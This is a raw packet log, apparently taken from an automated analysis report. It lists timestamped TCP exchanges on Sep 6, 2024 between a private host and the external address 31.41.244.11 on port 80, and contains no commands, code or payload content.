Sep 6, 2024 09:58:07.037074089 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.037075043 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.037086964 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.037098885 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.037100077 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.037115097 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.037132025 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.037403107 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.037415028 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.037427902 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.037441015 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.037452936 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.037457943 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.037480116 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.037492990 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.037498951 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.037509918 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.037516117 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.037522078 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.037533045 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.037543058 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.037549019 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.037560940 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.037566900 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.037578106 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.037584066 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.037585974 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.037596941 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.037611008 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.037630081 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.037636995 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.037642956 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.037652969 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.037664890 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.037667036 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.037679911 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.037693024 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.037693977 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.037704945 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.037719011 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.037729025 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.037733078 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.037744999 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.037763119 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.037765026 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.037776947 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.037796021 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.037811041 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.037811995 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.037826061 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.037836075 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.037849903 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.037862062 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.037863970 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.037867069 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.037868977 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.037869930 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.037870884 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.037869930 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.037878036 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.037883997 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.037890911 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.037893057 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.037899017 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.037900925 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.037902117 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.037914991 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.037935019 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.037936926 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.037945032 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.037945032 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.037957907 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.037964106 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.037976980 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.037983894 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.037990093 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.038001060 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.038012981 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.038012981 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.038022995 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.038031101 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.038036108 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.038048029 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.038053989 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.038058043 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.038060904 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.038067102 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.038072109 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.038094044 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.038099051 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.038105965 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.038116932 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.038125038 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.038155079 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.038167000 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.038180113 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.038192034 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.038193941 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.038208008 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.038211107 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.038228989 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.038244009 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.042114019 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.042129040 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.042190075 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.042324066 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.042373896 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.042376041 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.042392969 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.042418003 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.042440891 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.042448044 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.042459965 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.042475939 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.042489052 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.042491913 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.042532921 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.042561054 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.042572021 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.042583942 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.042599916 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.042613029 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.042613029 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.042627096 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.042635918 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.042635918 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.042640924 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.042658091 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.042658091 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.042666912 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.042670965 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.042680979 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.042705059 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.042717934 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.042728901 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.042740107 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.042754889 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.042759895 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.042768002 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.042777061 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.042807102 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.042808056 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.042820930 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.042833090 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.042840958 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.042864084 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.042865992 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.042879105 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.042892933 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.042905092 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.042913914 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.042933941 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.042958021 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.043061972 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.043072939 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.043083906 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.043097973 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.043108940 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.043116093 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.043128967 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.043143988 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.043158054 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.043158054 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.043186903 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.043189049 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.043203115 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.043225050 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.043355942 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.043369055 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.043380976 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.043399096 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.043417931 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.043430090 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.043437004 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.043442011 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.043452978 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.043456078 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.043468952 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.043479919 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.043507099 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.043509007 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.043518066 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.043529987 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.043534994 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.043548107 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.043560028 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.043560982 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.043574095 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.043579102 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.043596029 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.043602943 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.043622971 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.043634892 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.043639898 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.043639898 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.043648958 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.043657064 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.043662071 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.043675900 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.043678999 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.043690920 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.043695927 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.043706894 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.043718100 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.043720007 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.043735981 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.043747902 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.043759108 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.043771982 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.043788910 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.043790102 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.043801069 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.043807030 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.043812990 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.043822050 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.043826103 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.043838024 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.043839931 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.043848991 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.043859005 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.043863058 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.043874025 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.043886900 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.043905020 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.043925047 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.043927908 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.043931961 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.043935061 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.043947935 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.043962955 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.043972969 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.043976068 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.043987989 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.043987989 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.044002056 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.044014931 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.044019938 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.044027090 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.044039965 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.044045925 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.044051886 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.044064045 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.044064045 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.044076920 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.044080973 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.044090033 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.044107914 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.044135094 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.044373989 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.044384956 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.044414043 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.044425011 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.044429064 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.044436932 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.044449091 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.044450998 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.044473886 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.044501066 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.050724030 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.050750017 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.050762892 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.050776005 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.050812006 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.050823927 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.050832033 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.050870895 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.050883055 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.050884008 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.050894976 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.050906897 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.050934076 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.051093102 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.051105976 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.051116943 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.051130056 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.051136971 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.051142931 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.051151991 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.051155090 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.051179886 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.051192045 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.109450102 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.109476089 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.109514952 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.109529018 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.109554052 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.109572887 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.109580040 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.109584093 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.109611034 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.109625101 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.109636068 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.109641075 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.109646082 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.109648943 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.109680891 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.109707117 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.109718084 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.109730959 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.109745026 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.109746933 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.109786034 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.109802961 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.109805107 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.109814882 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.109824896 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.109841108 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.109867096 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.109884024 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.109899044 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.109920025 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.109930992 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.109931946 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.109945059 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.109968901 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.109998941 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.110017061 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.110106945 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.110119104 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.110141993 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.110150099 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.110160112 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.110176086 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.110179901 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.110208035 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.110213041 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.110220909 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.110229969 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.110241890 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.110250950 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.110255003 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.110265970 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.110270977 CEST	49719	80	192.168.2.7	31.41.244.11
